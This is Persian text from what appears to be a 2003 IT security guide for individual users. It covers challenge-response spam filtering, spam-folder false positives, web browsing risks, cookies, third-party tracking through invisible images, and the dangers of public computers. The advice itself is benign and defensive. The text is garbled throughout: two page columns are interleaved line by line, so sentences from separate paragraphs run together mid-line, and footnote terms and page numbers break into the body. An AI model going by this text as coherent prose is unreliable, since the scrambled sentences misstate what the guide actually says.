ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ. ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻧﺎﻣـﻪﺍﻱ ﺍﺯ ﻳـﻚ ﻓﺮﺳـﺘﻨﺪﺓ
ﺍﮔﺮ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺷﺪﻩ ﺍﺳـﺖ ﺑﺎﻳـﺪ ﺑﺮﺭﺳـﻲ ﻧﺎﺷﻨﺎﺱ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ ،ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ )ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﺑﺎﺯ
ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ISPﺷـﻤﺎ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ ﻛﻨﺪ( ﻣﺘﻮﻗﻒ ﻣﻲ ﮔﺮﺩﺩ .ﺳﭙﺲ ﭘﺮﺳﺸﻲ ﺑـﺮﺍﻱ ﻓﺮﺳـﺘﻨﺪﻩ ﺍﺭﺳـﺎﻝ
ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻳﺎ ﺧﻴﺮ .ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳـﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣــﻲﺷــﻮﺩ ﻭ ﺩﺭ ﺁﻥ ﺍﺯ ﻭﻱ ﺩﺭﺧﻮﺍﺳــﺖ ﻣــﻲﮔــﺮﺩﺩ ﻧﺎﻣــﻪﺍﻱ ﻛــﻪ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﻌﻠـﻮﻡ ﺷـﻮﺩ ﺁﻳـﺎ ﻓﺮﺳﺘﺎﺩﻩ ﺍﺳﺖ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ ﺗـﺎ ﺛﺎﺑـﺖ ﺷـﻮﺩ ﺁﻥ ﻧﺎﻣـﻪ ﺍﺯ ﺳـﻮﻱ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺭﺍ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﻨﺪ ﻳﺎ ﻧﻪ. ﻫﻤﺎﻥ ﻓﺮﺩ ﺍﺳﺖ ﻭ ﻧﻪ ﺍﺯ ﺟﺎﻧﺐ ﺷﺨﺺ ﺩﻳﮕﺮ ﻳﺎ ﻳﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ.
ﻓﺮﻡ ﺗﺄﻳﻴﺪﻳﻪ ﭼﻨﺎﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﻧﻤـﻲﺗﻮﺍﻧـﺪ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ ﻭ ﻧﻴﺰ ﺑﺮﺍﻱ ﻫﺮﺯﻧﺎﻣﻪﻫﺎﻱ ﺑﻌﺪﻱ ﻣﺆﺛﺮ ﻧﻴﺴﺖ .ﺍﮔـﺮ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺳﺎﻝ ۲۰۰۳ﻧﻮﺷﺘﻪ ﺷﺪ ،ﻭﺏ ﺣﺪﻭﺩ ۱۰ ﺗﺎ ﭼﻨﺪ ﺭﻭﺯ ﻫﻴﭻ ﺗﺄﻳﻴﺪﻳﻪﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻧﺸﻮﺩ ،ﻧﺎﻣﻪ ﺑﺠـﺎﻱ ﺗﺤﻮﻳـﻞ
ﺳﺎﻝ ﺑﺎ ﺳﻄﻮﺡ ﺩﺳﺘﺮﺳﻲ ﻣﺨﺘﻠﻒ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺷﺪﻥ ،ﺣﺬﻑ ﻣﻲﮔﺮﺩﺩ .ﻣﺸﻜﻞ ﺍﻳﻦ ﺭﻭﺵ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻴﺎﺯﻣﻨـﺪ
ﺍﺳﺖ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻭﺟﻮﺩ ﻭﺏ ﺑـﺮﺍﻱ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﻣﺪﺍﺧﻠﺔ ﺩﺳﺘﻲ ﻓﺮﺳﺘﻨﺪﻩ ﺍﺳﺖ .ﺍﮔﺮ ﻧﺎﻣـﻪﺍﻱ ﺭﺍ ﺑﻔﺮﺳـﺘﻴﺪ ﻭ ﻗـﺎﺩﺭ
ﻣﺮﺗﺒﹰﺎ ﺩﺭ ﻛـﺎﺭ ،ﻣﺪﺭﺳـﻪ ﻭ ﺗﻔـﺮﻳﺢ ﺍﺯ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﻧﺒﺎﺷﻴﺪ ﻛﻪ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺗﺄﻳﻴﺪﻳﻪ ﺳﺮﻳﻌﹰﺎ ﭘﺎﺳﺦ ﺩﻫﻴﺪ ﻧﺎﻣـﺔ ﺷـﻤﺎ
ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻭﺏ ﺑﺼﻮﺭﺕ ﺍﺑﺰﺍﺭﻱ ﻣﻔﻴﺪ ﻭ ﺭﺍﻳـﺞ ﺩﺭ ﺗﺤﻮﻳﻞ ﻧﺨﻮﺍﻫﺪ ﺷﺪ .ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﺩﻭ ISPﺑﺼﻮﺭﺕ ﻣﺘﻘﺎﺑـﻞ ﺍﺯ
ﺁﻣﺪﻩ ،ﻓﺮﺍﻣﻮﺵ ﺷﺪﻩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺤﻴﻄﻲ ﺧﺼﻮﻣﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ. ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻫﺮﮔـﺰ ﺍﺯ ﻳﻜـﺪﻳﮕﺮ
ﻧﺎﻣـﻪﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﻧﻜﻨﻨـﺪ؛ ﺯﻳـﺮﺍ ﺍﻭﻟـﻴﻦ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ ﻧﺎﻣــﻪ ﺭﺍ
ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺮﻭﺭﮔﺮﻫﺎ ﻧﻤﻲﺑﻴﻨﺪ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺗﺄﻳﻴـﺪ ﺷـﺪﻩ ﺑﺎﺷـﺪ ،ﻭ ﺗﻘﺎﺿـﺎﻱ ﺗﺄﻳﻴـﺪ ﻧﻴـﺰ
ﺍﺭﺳﺎﻝ ﻧﺨﻮﺍﻫﺪ ﺷﺪ ،ﭼﻮﻥ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﻧﺎﺷﻨﺎﺱ ﺍﺳﺖ .ﺑﺮﺧـﻲ ﺍﺯ
ﺑﻄﻮﺭ ﻛﻠﻲ ﻭﺏ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤﻦ ﺍﺳـﺖ ﺍﻣـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺧﻄـﺮﺍﺕ
ﺻﺎﻓﻴﻬﺎﻱ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﻧﺎﻣﻪﻫـﺎﻱ ﻣـﺸﻜﻮﻙ ﺭﺍ ﺣـﺬﻑ
ﻻ ﺩﺍﺭﺍﻱ ﻣﺘﻨﻬـﺎ
ﺑﺎﻟﻘﻮﻩﺍﻱ ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺭﺩ .ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻌﻤﻮ ﹰ
ﻛﻨﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻳﻚ ﭘﻮﺷﺔ ﻣﺨﺼﻮﺹ ﻗﺮﺍﺭ ﻣﻲ ﺩﻫﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ
ﻭ ﺗﺼﺎﻭﻳﺮ ﺍﻳﺴﺘﺎ ٧٧ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﻳﺎﻳﻲ ﻧﻴﺰ
٧٨
ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻄﻮﺭ ﻣﺘﻨﺎﻭﺏ ﭘﻮﺷﺔ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﺗـﺎ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ ﺷـﺪﻩ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﻗﺮﺑﺎﻧﻴﻬﺎﻱ False Positive
ﺑﺎﺷﻨﺪ.
ﻧﻴﺴﺘﻨﺪ.
77 Static
78 Dynamic 76 Challenge-Response
٨٥ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
80 Cursor
81 Link
82 Status Bar 79 Online Services
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٨٦
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺧﺎﺭﺟﻲ ﺫﺧﻴﺮﻩ ﻣﻲﮔﺮﺩﻧـﺪ ﺗﻔـﺎﻭﺕ ﻗﺎﺋـﻞ ﺷـﻮﺩ. ﺑﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﻭﺍﺭﺩ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻲﺷـﻮﻳﺪ،
ﺍﺳﺎﺳﹰﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺟﺎﺯﺓ ﺫﺧﻴﺮﺓ ﻫﻤﺔ cookieﻫﺎ ﺭﺍ ﺑﺪﻫﻴﺪ ،ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﻳـﻚ cookieﺑـﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ
ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ ،ﻭ ﻳﺎ ﺍﺯ ﻣﺮﻭﺭﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻼ ﭘﺲ ﺍﺯ ﻳﻚ ﻫﻔﺘﻪ ﺩﻭﺑﺎﺭﻩ ﺑـﻪ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ .ﻭﻗﺘﻲﻛﻪ ﻣﺜ ﹰ
ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺍﺯ ﺷﻤﺎ ﺳﺆﺍﻝ ﻧﻤﺎﻳﺪ .ﺷﻤﺎ ﻫﺮﮔﺰ ﻣﻄﻠﻊ ﻧﻤﻲﺷﻮﻳﺪ ﻛﻪ ﺁﻥ ﻣﺮﺍﺟﻌﻪ ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ
ﭼﻪ ﺯﻣﺎﻧﻲ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺩﺭ ﻳـﻚ cookieﺑـﻪ ﭘﺎﻳﮕـﺎﻩ cookieﻣــﺬﻛﻮﺭ ﺑــﺼﻮﺭﺕ ﺧﻮﺩﻛــﺎﺭ ﻭﺍﺭﺩ ﺁﻥ ﭘﺎﻳﮕــﺎﻩ ﺷــﻮﻳﺪ.
ﻭﺏ ﻣﺒﺪﺃ ﺑﺎﺯﻣﻲﮔﺮﺩﺩ. Cookieﻫﺎ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺁﻧﭽـﻪ
ﺭﺍ ﻛﻪ ﺩﺭ ﻳﻚ ﺟﻠﺴﻪ ٨٣ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻳﺪ ﺭﺩﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ.
Cookieﻫﺎ ﺭﺍ ﻣﻲﺗـﻮﺍﻥ ﺑﺮﺭﺳـﻲ ﻧﻤـﻮﺩ ﺯﻳـﺮﺍ ﺩﺭ ﻗﺎﻟـﺐ ﻣﺘﻨـﻲ
ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﭼﻮﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺁﻥ ﺗﻮﺳـﻂ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺍﮔﺮﭼﻪ ﻳﻚ cookieﺑﻪ ﺷﻜﻞ ﻣﻌﻤﻮﻝ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ
ﻻ ﻗﺎﺑﻞ ﻓﻬﻢ ﻧﻤﻲﺑﺎﺷﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﻣﺒﺪﺃ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻣﻌﻤﻮ ﹰ ﻭﺏ ﻣﺒﺪﺃ ﺧﻮﺩ ﺑﺎﺯﻳﺎﺑﻲ ﺷﻮﺩ ،ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﭘﺎﻳﮕـﺎﻩ ﻭﺑـﻲ ﻛـﻪ
ﻣﺮﻭﺭﮔﺮﻫﺎ ﺍﺟﺎﺯﺓ ﻧﻤﺎﻳﺶ ﻭ ﺣـﺬﻑ cookieﻫـﺎ ﺭﺍ ﻣـﻲﺩﻫﻨـﺪ ﻭ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺣﺎﻭﻱ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺍﺷـﻴﺎﺀ ﺩﻳﮕـﺮﻱ ﺑﺎﺷـﺪ ﻛـﻪ
٨٤
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺛﺎﻟﺜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﺟـﺎﺯﺓ ﻣـﺪﻳﺮﻳﺖ ﺁﻧﻬـﺎ ﺭﺍ ﻧﻴـﺰ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺛﺎﻧﻮﻳﻪ ﻫﺴﺘﻨﺪ )ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧـﺎﺭﺟﻲ
ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﻧﺪ. ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺷﺨﺺ ﺛﺎﻟﺚ ٨٥ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ( ﻭ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺛﺎﻧﻮﻳـﻪ
ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ cookieﻫﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻭ ﺑﺎﺯﻳـﺎﺑﻲ ﻧﻤﺎﻳـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ
ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺷـﻤﺎ
ﻼ ﻣﺘﻮﺟـﻪ ﺗﺼﺎﻭﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺎﻣﺮﺋﻲ ﺑﺎﺷـﻨﺪ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺻـ ﹰ
ﻣﻲ ﺩﺍﻧﺪ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺯﻣـﺎﻥ ﻭ ﭼﮕـﻮﻧﮕﻲ ﺫﺧﻴـﺮﻩﺷـﺪﻥ
ﻧﺸﻮﻳﺪ ﻛﻪ ﭼﻨﻴﻦ ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺍﻳـﻦ ﺗـﺼﺎﻭﻳ ﹺﺮ ﻏﻴﺮﻗﺎﺑـﻞ
cookieﻫﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻧﻤﺎﻳﻴـﺪ .ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ
ﺭﺅﻳﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺭﺩﻳﺎﺑﻲ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺑـﻲ ﻛـﻪ ﺷـﻤﺎ ﺁﻧﻬـﺎ ﺭﺍ
ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺪﺭﺳﺘﻲ ٨٦
ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺗﺒﻠﻴﻐﺎﺗﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ.
ﻋﻤﻞ ﻧﻤﺎﻳﻨﺪ ﻧﻴﺎﺯﻣﻨـﺪ ﺫﺧﻴـﺮﺓ cookieﻫـﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﻛـﺎﺭﺑﺮ
ﻣﻲﺑﺎﺷﻨﺪ .ﻋﻤﻮﻣﹰﺎ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺩﺭﺻﻮﺭﺕ ﻏﻴﺮﻓﻌﺎﻝ ﺑﻮﺩﻥ
ﻗﺎﻧﻮﻥ ﺳﻴﺰﺩﻫﻢ
cookieﻫﺎ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻉ ﻣﻲﺩﻫﻨـﺪ ﻛـﻪ ﻗـﺎﺩﺭ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻳـﺎ
ﭼﮕﻮﻧﮕﻲ ﻭﺿﻌﻴﺖ ﺫﺧﻴﺮﺓ cookieﻫﺎ ﺑﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪ
ﺗﻜﻤﻴﻞ ﻋﻤﻠﻴﺎﺕ ﻧﻴﺴﺘﻨﺪ.
ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺍﮔﺮ ﻧﻤﻲ ﺗﻮﺍﻧﻴـﺪ ﺁﻧﻬـﺎ ﺭﺍ
ﺍﮔﺮ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ )ﻣﺜـﻞ ﻛـﺎﻓﻲﻧـﺖ ،ﻛﺘﺎﺑﺨﺎﻧـﻪﻫـﺎ ،ﻣـﺪﺍﺭﺱ( ﺍﺯ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ )ﻣﺎﻧﻨﺪ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﻳـﻚ ﻣﻜـﺎﻥ
ﻣﺮﻭﺭﮔﺮﻫــﺎﻱ ﻭﺏ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﻛﻨﻴــﺪ ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ( ﺍﻃﻼﻋﺎﺕ ﺧـﺼﻮﺻﻲ ﺧـﻮﺩ ﺭﺍ
cookieﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﻫﺴﺘﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺫﺧﻴـﺮﻩ
ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻧﻜﻨﻴﺪ.
ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺭﺍﻫﺒﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ
ﺁﻧﻘﺪﺭ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺩﻩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴـﺪ cookieﻫـﺎ ﺭﺍ ﻛﻨﺘـﺮﻝ، ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﺗﺎ ﺳﻄﺢ ﻛﻨﺘﺮﻝ ﺧﺎﺻﻲ ﺑﻪ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥ
ﻧﻈﺎﺭﻩ ﻭ ﻳﺎ ﭘﺎﻙ ﻛﻨﻴﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﺩﺭ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻭﺟﻮﺩ cookieﻫﺎ ﺭﺍ ﻣﺠﺎﺯ ﺑﺪﺍﻧﻴﺪ ﻳﺎ ﺧﻴﺮ .ﺩﺭ ﺑﺮﺧﻲ
ﻣﻲﻣﺎﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﻛـﻪ ﻫﻤـﺎﻥ ﭘﺎﻳﮕـﺎﻩ ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻭﺭﮔﺮ ﻣﻴﺎﻥ cookieﻫﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ
ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺍﮔﺮ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺍﻧﺪcookie ،ﻫﺎﻳﻲ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑـﺴﺘﻦ ﻣﺮﻭﺭﮔـﺮ
ﻭﺑﻲ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﺎﺷﻴﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﻣﻌﺘﺒﺮ ﺷﻤﺎ ﺩﺭ ﻳـﻚ cookie ﻧﺎﭘﺪﻳﺪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﻫﻨﮕﺎﻡ ﻣﺸﺎﻫﺪﺓ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﻭﺏ ﻭ
ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﻛﺎﺭﺑﺮ ﺩﻳﮕﺮﻱ ﺑﻪ ﻫﻤﺎﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌـﻪ
83 Session
ﻧﻤﺎﻳﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﺠﺎﻱ ﺷﻤﺎ ﻭﺍﺭﺩ ﺁﻥ ﭘﺎﻳﮕﺎﻩ 84 Foreign Site
85 Third-Party Site
ﮔــﺮﺩﺩ .ﺩﺭﻧﺘﻴﺠــﻪ ﺍﺣﺘﻤــﺎﻝ ﺩﺍﺭﺩ ﻛــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﺍﻃﻼﻋــﺎﺕ ﻓﺮﺽ ﻛﻨﻴﺪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ Aﻭ Bﻭ Cﻭ Dﻫﻤﮕﻲ ﻳﻚ ﺗﺼﻮﻳﺮ ﻧﺎﻣﺮﺋﻲ ۸۶
ﺫﺧﻴﺮﻩﺷﺪﺓ ﺷﻤﺎ )ﻣﺎﻧﻨﺪ ﻧﺎﻡ ،ﺁﺩﺭﺱ ﻭ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ( ﺭﺍ ﺩﺭ ﺍﺯ ﭘﺎﻳﮕﺎﻩ Zﻧﻤﺎﻳﺶ ﻣﻲﺩﻫﻨﺪ .ﻭﻗﺘﻲ ﺗﺼﻮﻳﺮ ﻣﺮﺑﻮﻃﻪ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﺷﻤﺎ ﺑﻪ
ﺍﺧﺘﻴﺎﺭ ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﻗﺮﺍﺭ ﺩﻫﺪ. ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ Z ،ﻣﻄﻠﻊ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﺯ ﻛﺪﺍﻡ ﭘﺎﻳﮕﺎﻩ ﺑـﻪ ﺁﻥ ﺍﺷـﺎﺭﻩ
ﺷﺪﻩ ﺍﺳﺖ ،ﻭ ﺳﭙﺲ cookieﻫﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ
